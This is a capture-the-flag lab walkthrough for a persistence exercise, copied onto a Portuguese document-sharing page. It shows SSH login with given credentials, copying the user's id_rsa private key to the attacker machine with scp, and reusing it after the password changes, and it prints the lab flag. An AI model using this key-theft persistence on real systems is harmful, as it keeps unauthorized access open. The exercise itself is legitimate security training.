Prévia do material em texto
<p>Name Maintaining access I</p><p>URL https://www.attackdefense.com/challengedetails?cid=954</p><p>Type Persistence : Maintaining Access</p><p>Important Note: This document illustrates all the important steps required to complete this lab.</p><p>This is by no means a comprehensive step-by-step solution for this exercise. This is only</p><p>provided as a reference to various commands needed to complete this exercise and for your</p><p>further research on this topic. Also, note that the IP addresses and domain names might be</p><p>different in your lab.</p><p>Objective:</p><p>1. Maintain access on the target machine after the credentials are modified. Use SSH</p><p>related artifacts for this.</p><p>2. Retrieve flag from the target machine.</p><p>Solution:</p><p>Step 1: Finding the IP address of target machine.</p><p>Command: ip addr</p><p>https://www.attackdefense.com/challengedetails?cid=954</p><p>The target machine is at IP 192.37.104.3</p><p>Step 2: SSH into the target machine</p><p>The SSH login credentials are provided in the challenge description:</p><p>● Username: student</p><p>● Password: password</p><p>Commands:</p><p>ssh student@192.37.104.3</p><p>Enter password “password”</p><p>Step 3: Enumerate files present in home directory.</p><p>Command: ls -al</p><p>SSH key pair is present in the “.ssh” directory.</p><p>Step 4: Exit SSH session and copy ssh private key to attacker machine.</p><p>Commands:</p><p>scp student@192.37.104.3:~/.ssh/id_rsa .</p><p>Enter password “password”.</p><p>Step 5: SSH into student machine and delete the wait file.</p><p>Commands:</p><p>ssh student@192.37.104.3</p><p>Enter password “password”.</p><p>rm wait</p><p>The SSH session is terminated.</p><p>Step 6: SSH into the target machine with the private key.</p><p>Commands:</p><p>chmod 400 id_rsa</p><p>ssh -i id_rsa student@192.37.104.3</p><p>Step 7: Retrieve the flag.</p><p>Commands:</p><p>ls -l</p><p>cat flag.txt</p><p>Flag: 689227a4f1b97afe1ff5ebaf85babc19</p>
Mais conteúdos dessa disciplina
Segurança e Auditoria de Sistemas- ACTIVIDAD-NM3-EDUCACIÓN-PARA-LA-CIUDADANÍA
- Mapa Mental - Segurança da Informação
- IA na Prática Forense
- Where to Buy Old Gmail Accounts with Real Age and History
- Top Reasons to Buy Old Gmail Accounts for Marketing Success
- Top 10 Secure Sites to Buy Verified Paypal Accounts PVA in 2025
- Best Site to Buy Telegram Accounts in 2025-26 From Pvasmmpath_ Ultimate Guide
- Setting Up Binance Safely_ A Beginner Handbook
- How to Set Up Your Binance Account Step by Step
- How to Build a Secure Binance Login and Profile
- Top 4 Free Email Accounts For Growing Businesses
- Legal and Safe Alternatives to Buying Verified Binance Accounts
- Pergunta 1 Sobre os modelos de implantação de computação em nuvem (cloud pública, privada ou híbrida), analise as afirmações a seguir: A nuvem...
- Segundo a LGPD, quem é o responsável por determinar as finalidades e os meios de tratamento de dados pessoais? Selecione a opção correta e, em segu...
- A LGPD está relacionada à proteção de dados pessoais. Qual é a definição de dados pessoais? Selecione a opção correta e, em seguida, clique no botã...
- Qual é a definicao de pericia forence computacional segundo Teixeira (2020)
- De acordo com a LGPD, em que momento a finalidade do processamento para a qual o consentimento é fornecido deve ser documentada? Selecione a opção ...
- Qual a diferença de dados pessoais e dados pessoais sensíveis? Selecione a opção correta e, em seguida, clique no botão "Confirmar". a) Os dados p...
- qual e a definicao de pericia forence computacional segundo teixera (2020)
- A alternativa correta é a **A**. As afirmações **I, II** e **IV** estão corretas. --- ### 🧠 Análise das Afirmativas sobre a Articulação do Ombro | Af
- Observe a imagem a seguir: 13.png Fonte: Saiba como os malwares atacam o vosso computador. Pplware. 24/04/2017. Disponível em: https://pplware.sapo.pt
- Uma empresa de comunicação coleta e trata dados pessoais de indivíduos com a finalidade exclusiva de produzir reportagens jornalísticas investigativas
- A Lei nº 13.709, de 14 de agosto de 2018, conhecida como Lei Geral de Proteção de Dados Pessoais (LGPD), representa um marco regulatório no Brasil qua
- Pertence às características do caráter de uma pessoa ou do caráter de um grupo que se relacionam com quem são e o que é significativo para eles. Um ma
- A engenharia social é uma técnica de ataque cibernético que explora vulnerabilidades humanas para obter informações confidenciais ou acessar sistem...
- ➎ A combustão completa do propano (C3H8) é dada pela seguinte reação:
C3H8 + O2 → CO2 + H2O
Qual a massa de dióxido de carbono (CO2), em gramas, ...
- ➏ A combustão completa do etanol (C2H6O) é dada pela seguinte reação:
C2H6O + O2 → CO2 + H2O
Qual a massa de dióxido de carbono (CO2), em gramas, q...
